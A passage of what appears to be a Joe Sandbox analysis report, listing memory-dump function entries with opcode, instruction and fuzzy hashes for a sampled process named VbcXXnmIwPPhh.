                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hq$Hq
                                                              • API String ID: 0-925789375
                                                              • Opcode ID: f336f10df6ca7de4855692a312c704d975caa7d10301e5a7e854dff46b535afb
                                                              • Instruction ID: a0c0d4ab4f22824575235a22a0422a042908512afc81d3384329ee47c9b81da8
                                                              • Opcode Fuzzy Hash: f336f10df6ca7de4855692a312c704d975caa7d10301e5a7e854dff46b535afb
                                                              • Instruction Fuzzy Hash: 3C91B0303002058FEB25AF68DC6476E7BF2BBC9205F544569E9468B396DB35DC42CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,q$,q
                                                              • API String ID: 0-1667412543
                                                              • Opcode ID: 114e611ec87f3bb59b322ca20863c37471bbc59ae0635461266c9dd94ddcf263
                                                              • Instruction ID: 3a5b9eeabfee9c8c330c83270e01a75d7b0eca641008b69f558915c2e0e0a1d8
                                                              • Opcode Fuzzy Hash: 114e611ec87f3bb59b322ca20863c37471bbc59ae0635461266c9dd94ddcf263
                                                              • Instruction Fuzzy Hash: 5C817034A00516CFDB14EF6DCC84A69BBF6FF89214B148269D506DB365DB31EC81CBA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oq$(oq
                                                              • API String ID: 0-1396055846
                                                              • Opcode ID: ea0faa73deb72dbec0dfb123cdc4577ae0fe36a131f8c54a402a0c163770398a
                                                              • Instruction ID: bd2584a65cc16b311cc1f16b14af83b3fbfec673c4288fd739fa7ea3ef6aab44
                                                              • Opcode Fuzzy Hash: ea0faa73deb72dbec0dfb123cdc4577ae0fe36a131f8c54a402a0c163770398a
                                                              • Instruction Fuzzy Hash: B2618231B006058FDB14EF68DC54A6EBBB6BFC8711F148669E516DB3A5DB31AC02CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'q$4'q
                                                              • API String ID: 0-1467158625
                                                              • Opcode ID: efd90496bccdc74f9224593da6da64889fa75ec9e44815106f8e6c318c86d2a4
                                                              • Instruction ID: 0abac9eb37c84a57457fa0e105f7ec2a832fcf59504b5c328bcf67bca9aa391e
                                                              • Opcode Fuzzy Hash: efd90496bccdc74f9224593da6da64889fa75ec9e44815106f8e6c318c86d2a4
                                                              • Instruction Fuzzy Hash: A7519E317002059FDB10EF69DC44B7ABBA6EBC8318F44856AEA09CB355EB71DC01DBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xq$Xq
                                                              • API String ID: 0-1556399337
                                                              • Opcode ID: 5d3525168b281eab683f8daa7b2c277d9e17b1a4d563ecb81a478137f531b0ad
                                                              • Instruction ID: 2d14b7460afd08fc8e0ef98854a0e32eb32a0cc23b3b90a129ebf42d97ff15fc
                                                              • Opcode Fuzzy Hash: 5d3525168b281eab683f8daa7b2c277d9e17b1a4d563ecb81a478137f531b0ad
                                                              • Instruction Fuzzy Hash: 14310A33B043654BEF296A798CA537EBAA6BBC4600F18423DD816C7385DBB5CC068761
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $q$$q
                                                              • API String ID: 0-3126353813
                                                              • Opcode ID: f311733805839294709c2a683f64addb76f43e65bde5e4628f201b83b93ed25b
                                                              • Instruction ID: c4bfdc80d69b3f60ae1cfcb64dee9753fc1fed63eb6506ec8029ff1e78187bf1
                                                              • Opcode Fuzzy Hash: f311733805839294709c2a683f64addb76f43e65bde5e4628f201b83b93ed25b
                                                              • Instruction Fuzzy Hash: 8131B2303002118FDB36AB2DDC5463EB76BBF84780BA8465AE202CB392DF64DC41CB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRq
                                                              • API String ID: 0-3187445251
                                                              • Opcode ID: f6bbab1f577971e366050452ce37bcef2786252e4cdf13c93246c1382a00b22b
                                                              • Instruction ID: fb189e8574d21ea0ac7c10f2d7dc2dbff8627783dbf4f48ca664be3f66046555
                                                              • Opcode Fuzzy Hash: f6bbab1f577971e366050452ce37bcef2786252e4cdf13c93246c1382a00b22b
                                                              • Instruction Fuzzy Hash: 6352E674A00219CFCB64DF25ED98B9DB7B2FB49301F1081A9D819AB364DB346E85CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRq
                                                              • API String ID: 0-3187445251
                                                              • Opcode ID: 49b888b871651ede6f8f62fe71854158c97b864af27dd0036f24add3af7c72a7
                                                              • Instruction ID: 4d8a65cb510a2686b9daeb668e2fb2ef586069400be609949302ed885aa4721e
                                                              • Opcode Fuzzy Hash: 49b888b871651ede6f8f62fe71854158c97b864af27dd0036f24add3af7c72a7
                                                              • Instruction Fuzzy Hash: 0C52E674A00219CFCB64DF25ED98ADDB7B2FB49301F1081A9D819AB364DB346E85CF91
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06DF9A6E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2b4a6fce8437f956377626ad1bbc6f8a8e8711ad0119654bbb43590c2fd910b0
                                                              • Instruction ID: 54607c41733a82b857eb77fabec89c7f8c11ec2f175267a66794180c82c5ae72
                                                              • Opcode Fuzzy Hash: 2b4a6fce8437f956377626ad1bbc6f8a8e8711ad0119654bbb43590c2fd910b0
                                                              • Instruction Fuzzy Hash: 09116A74E102098FEB44DBA8D894FADB7F5FB88314F158265EA44AB242DB30D941CB60
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7033e9507be86f605c79033d1ebac38fe261abe1beed3d88c87033b40d879b67
                                                              • Instruction ID: 25c50bb50b8be1f441b4c09b86ab6d193bad7542782bbc23375107bdc8d25558
                                                              • Opcode Fuzzy Hash: 7033e9507be86f605c79033d1ebac38fe261abe1beed3d88c87033b40d879b67
                                                              • Instruction Fuzzy Hash: 9312A8350612528FD3702F64EEBC16EBA64FB0F323385BC81E15B85449AB327468CF62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b38006b80986c68a8341bf1298b3a1ed35db68f7a43d68f1a9b9ef573d54f59
                                                              • Instruction ID: 4faa43254e2a37cb865b25cb0c9328b1294c4739f79cd7db3141b5b89f148e25
                                                              • Opcode Fuzzy Hash: 0b38006b80986c68a8341bf1298b3a1ed35db68f7a43d68f1a9b9ef573d54f59
                                                              • Instruction Fuzzy Hash: 241298350612538F93702F64EEBC16EBA64FB1F323385BC81E55B85449AB727468CF62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c0a5867037a46165728c85f938055f941cdcb602cf823a5f0df7a592b47b007
                                                              • Instruction ID: d9df1a28941984c19abb45a438526db4e7101ec45063cdf7d41b0a8d1cf81ca6
                                                              • Opcode Fuzzy Hash: 2c0a5867037a46165728c85f938055f941cdcb602cf823a5f0df7a592b47b007
                                                              • Instruction Fuzzy Hash: 0C81E1305006059FCB11EF28CC849BAFBBAFFC5328B548666D9599B355D331F912CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d66f0a65bf56bdd7bd04fd8856af159cd866bc8d702c4406c2921a053411637a
                                                              • Instruction ID: 970ff89372f8c43f1375e63b75fc0acf6ec035af4f2999ee7f59a98f1b392461
                                                              • Opcode Fuzzy Hash: d66f0a65bf56bdd7bd04fd8856af159cd866bc8d702c4406c2921a053411637a
                                                              • Instruction Fuzzy Hash: B9714B347006068FDB25EF6CCCA4A6E7BEAAF49301B5582A9E911DB371DB70DC41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff706b809c6afb32b25b1fcc640f99a9d432157a018ad1e0c9dccc575d56bcb
                                                              • Instruction ID: 98d0f38262c90b9a667f0368b23a925d5ac5b195512368906f7ab507e973fee0
                                                              • Opcode Fuzzy Hash: aff706b809c6afb32b25b1fcc640f99a9d432157a018ad1e0c9dccc575d56bcb
                                                              • Instruction Fuzzy Hash: 8B511274D01319CFDB24DFA5D894BAEBBB2FF88300F608169D806AB258DB355946CF50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e40481c53005d42facedafe196f85f96ad8368902e8cb661803cff32bdce4166
                                                              • Instruction ID: 880b163ce001e1a207d2aa002647ff63da05e9bb6c49fe67b639157cb310df54
                                                              • Opcode Fuzzy Hash: e40481c53005d42facedafe196f85f96ad8368902e8cb661803cff32bdce4166
                                                              • Instruction Fuzzy Hash: 5B51A674E01208DFDB54DFAAD584A9DBBF2FF89310F24816AE815AB364DB309945CF10
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9749e752a3b81dd031f3a941d6097aec20d4eee2b270de2d0ca681f5201877
                                                              • Instruction ID: 4e1bc179c1abd6a5262d79c1fb89fdb591f987836b61865a2aaa9e49b70a3eb0
                                                              • Opcode Fuzzy Hash: 5c9749e752a3b81dd031f3a941d6097aec20d4eee2b270de2d0ca681f5201877
                                                              • Instruction Fuzzy Hash: 0F516374E01308CFCB08DFAAD59499DBBB2FF89301B209169E815AB364DB359C45CF54
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c4ec2ddf96cc175c3deba551cfd4f4aad8f99f224f41e80f195168de64f0a9a
                                                              • Instruction ID: 2fb4a291b9a1401c8d0e46913ae35d29bdcee15ac0cb80ed9c954ea0e6e6576c
                                                              • Opcode Fuzzy Hash: 0c4ec2ddf96cc175c3deba551cfd4f4aad8f99f224f41e80f195168de64f0a9a
                                                              • Instruction Fuzzy Hash: C0418D31A00249DFDF11DFA8CC48A9EBFB2BF89310F048656E905AB396D370E914CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d76db36fe0b9d928befcd5d3a856e829ce9d65e8e6790b6651d8b5f00a8a007
                                                              • Instruction ID: 6637492dc3f807df12dc9a6b2c26080a3d5c2346c32e51caa1e4999b5333f72c
                                                              • Opcode Fuzzy Hash: 5d76db36fe0b9d928befcd5d3a856e829ce9d65e8e6790b6651d8b5f00a8a007
                                                              • Instruction Fuzzy Hash: 7F41F070A042499FDB119F68CC14BAEBBF2EB84300F24816AE8059B252D775ED46CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 593f985b92c8a1c7dd11392a25e7c0fb345672160c3f1c4ebc7e44d1fb8ccc74
                                                              • Instruction ID: d83a30a14e50da75d4a273e3ab684ee62a7a98d028c376004335c843ba22d5f9
                                                              • Opcode Fuzzy Hash: 593f985b92c8a1c7dd11392a25e7c0fb345672160c3f1c4ebc7e44d1fb8ccc74
                                                              • Instruction Fuzzy Hash: 4431803120020ADFDF16AF69DC54AAF3BA6FB98211F408025F9168B354CB75DD61DFA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 505b2688f5c6fc197c3ba822bc6cdd130a658f1ed760581cc7ae297298b2772f
                                                              • Instruction ID: 77d12006a45f2259af10b97cf66fe44e18641f007fd684a075da7d94d60fea97
                                                              • Opcode Fuzzy Hash: 505b2688f5c6fc197c3ba822bc6cdd130a658f1ed760581cc7ae297298b2772f
                                                              • Instruction Fuzzy Hash: 0E311370D043598FCB15EFA9D8546EEBFF4FB4A300F1042AAC505AB264EB341A45CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf340e898dc429ee072befd7344007e705aacec28e32e5fb5672b0f7e7944e58
                                                              • Instruction ID: 50720beaf75e5d92794d5f88e628bc5e0bc40dfa7ea3d1aa8a71ce3e045edc57
                                                              • Opcode Fuzzy Hash: bf340e898dc429ee072befd7344007e705aacec28e32e5fb5672b0f7e7944e58
                                                              • Instruction Fuzzy Hash: 4121D0323022044BEB257A2D9C5473E769EAFC4748FA4813DD906CB79AEB65CC429781
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f7609c6f271cd78feb57b49e2cc5955394260f45ade7601c5ebf3952fd742edd
                                                              • Instruction ID: 7b70c0d3b65ce22eb97f15c4f01235372265aafd654dd50c178750212a8f6056
                                                              • Opcode Fuzzy Hash: f7609c6f271cd78feb57b49e2cc5955394260f45ade7601c5ebf3952fd742edd
                                                              • Instruction Fuzzy Hash: 2921A435A002059FCF15DF29C850AAE3BB5EB9D360B61C65DD8099B344DB35EE46CBD0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719518998.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_151d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7b24f676ee26961c2d94b55b7ff22429bfa08314ee4c64790b7fe38a18034bc
                                                              • Instruction ID: 47d38ab996f9b4dfabd76dc2678915ff10f80fe3489e9580c1b87d480ea6f0f9
                                                              • Opcode Fuzzy Hash: a7b24f676ee26961c2d94b55b7ff22429bfa08314ee4c64790b7fe38a18034bc
                                                              • Instruction Fuzzy Hash: 5D21D671504240EFEF16DF94D9C4B1ABBB5FB88314F248969E9090F25AC336D456CAA2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719568904.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_152d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd1cd1d54f9b632a69291b5af0b74420df40e2cdb8d2125661796601b781417f
                                                              • Instruction ID: d43a13d8f87ee79f4f41297640e42687c338a6730828ccbef0978aa9af348b98
                                                              • Opcode Fuzzy Hash: dd1cd1d54f9b632a69291b5af0b74420df40e2cdb8d2125661796601b781417f
                                                              • Instruction Fuzzy Hash: BD210772504304EFDB15DF64D9C0B65BBB5FB85314F20C96DE84A4F292C376E446CAA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719568904.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_152d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35a2204ef38c1efad3898a02309977636de2133b3d69699532cf764f0a18fb8a
                                                              • Instruction ID: 65ad48ddbc88ab5a48d0433834a77e2a462d95b75b00a684074bb7a200865b64
                                                              • Opcode Fuzzy Hash: 35a2204ef38c1efad3898a02309977636de2133b3d69699532cf764f0a18fb8a
                                                              • Instruction Fuzzy Hash: F7212272504204EFDB15CF64C9C4B2ABBB1FB85314F20C96DE8490F2A2D73AD847CA62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719568904.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_152d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27d15916b70368a6a7c117d2ed1115753890eaaeb3fe11c5721062ab50650545
                                                              • Instruction ID: deab3cc38db48c3c3a18d3feb68eb85d339f9818d9c312221ffb60f2af8b7804
                                                              • Opcode Fuzzy Hash: 27d15916b70368a6a7c117d2ed1115753890eaaeb3fe11c5721062ab50650545
                                                              • Instruction Fuzzy Hash: D1212972504204DFDB15DF94D9C4B1ABBB5FB86334F20C969E8094F282C376D446CA62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b99def26b0ea994a3c2b404e6ddf30a4fc8d5f2556052c17d29c95c909f3d6b
                                                              • Instruction ID: e9c2d21a7ecbb2a336ec62df738ca49d8f6088bab96c8a924f28e9a2a2b8c052
                                                              • Opcode Fuzzy Hash: 4b99def26b0ea994a3c2b404e6ddf30a4fc8d5f2556052c17d29c95c909f3d6b
                                                              • Instruction Fuzzy Hash: 1011D3357046118FD7259A2DDC64A2EBBA2FF893527195279E906CB794CF31DC028B80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eedde7dc86b6fa98622783636ee30c55d52f7db7e893d43254e75575b2df5d0
                                                              • Instruction ID: cf1427c5d9bd08b74c9e3d1762c4033791fe3ba48ade59881fdfe9f634859833
                                                              • Opcode Fuzzy Hash: 5eedde7dc86b6fa98622783636ee30c55d52f7db7e893d43254e75575b2df5d0
                                                              • Instruction Fuzzy Hash: D421D131605209CFDB16AF28EC5466F3BA5FB98215F008169F9068B359CB74CEA5CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38383cb3121ce6ff4a51c541f17ba6719a4d572fe1f2bcc73683a6aea70fc2a7
                                                              • Instruction ID: 976dd52595290fc067085f5db78846fca86ec6056fd8099de1d667d15805f46c
                                                              • Opcode Fuzzy Hash: 38383cb3121ce6ff4a51c541f17ba6719a4d572fe1f2bcc73683a6aea70fc2a7
                                                              • Instruction Fuzzy Hash: B031A378E01308CFCB08DFA9E59499DBBB2FF49301B209069E819AB324DB35AC45CF40
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6c650dbeb3f9603be921cd56ca422d08cec2a06934ad96af92b5708fa20258d
                                                              • Instruction ID: 183f330245e1168e7b22716495832b432b81f70f0cef5974213dad7d6695b8ae
                                                              • Opcode Fuzzy Hash: e6c650dbeb3f9603be921cd56ca422d08cec2a06934ad96af92b5708fa20258d
                                                              • Instruction Fuzzy Hash: 3C215770E012499FDB15DFA5D990AEEBFB6AF88308F148069E411A6294DB34E941CF60
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64306cf3d1325daa4385bde54c7db72b21642958a1297b2ef749a2cae63683af
                                                              • Instruction ID: 403d7cad1ad910b00b140c712671877deeccd5ca5a74550a4b0dabab77c0a844
                                                              • Opcode Fuzzy Hash: 64306cf3d1325daa4385bde54c7db72b21642958a1297b2ef749a2cae63683af
                                                              • Instruction Fuzzy Hash: 41119376B00204ABCB109F98DC44BDDBBB6FB8C310F549126E915A7394DB71AC10CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0156233e1bfd9739d318569a751e4f334878740de16ee92430a21f8963f3ccef
                                                              • Instruction ID: 042812d21fcac3bfeafac845eb9143c3ae977c2394d23b3ffb9182d63de8c35a
                                                              • Opcode Fuzzy Hash: 0156233e1bfd9739d318569a751e4f334878740de16ee92430a21f8963f3ccef
                                                              • Instruction Fuzzy Hash: AE11A5353016119FD7256A2EDC6492E7BA6FFC57513185178EA06CB354CF31DC028B90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7e9852cddae9eca95d5c1af18aafd89c74e9366d2257a6ef075db2dc86c9b5c
                                                              • Instruction ID: 8f84c3b0a4af64ab174b9a5944667fa8c562905ef78190b601f7231d441cacd2
                                                              • Opcode Fuzzy Hash: d7e9852cddae9eca95d5c1af18aafd89c74e9366d2257a6ef075db2dc86c9b5c
                                                              • Instruction Fuzzy Hash: 77215974E0020A9FEB54EFA9D94079EBBF2FB85300F1482A9C4289B254EB745E45CB81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10d1aa9265549da9b4df853eb303f71eff2e277a5226820d1f09b011391e94fb
                                                              • Instruction ID: 0844f9887c90a12e82f6568e85be1f49b57011665ec21d27cc96f7ba10d851d5
                                                              • Opcode Fuzzy Hash: 10d1aa9265549da9b4df853eb303f71eff2e277a5226820d1f09b011391e94fb
                                                              • Instruction Fuzzy Hash: DA21DBB0C0020A8FCF54EFA9D9445EEBFF0EF0A300F10526AD905B6224EB345A95CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719518998.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_151d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                              • Instruction ID: cb9eb0c7227a1420844175c6b021246dc0242cb789435bf27becb776ea664db7
                                                              • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
